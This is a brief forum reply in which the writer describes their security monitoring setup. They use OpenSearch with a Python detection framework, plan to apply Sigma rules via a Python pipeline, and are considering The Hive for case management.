To be honest: I have given up on the SA-module for now. We are using opensearch as the data store and are doing detection with a simple python framework. I want to use the setup of another university in the Netherlands to use sigma rules, but from a python pipeline as well. For case management we are looking into The Hive.
1 Like
This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.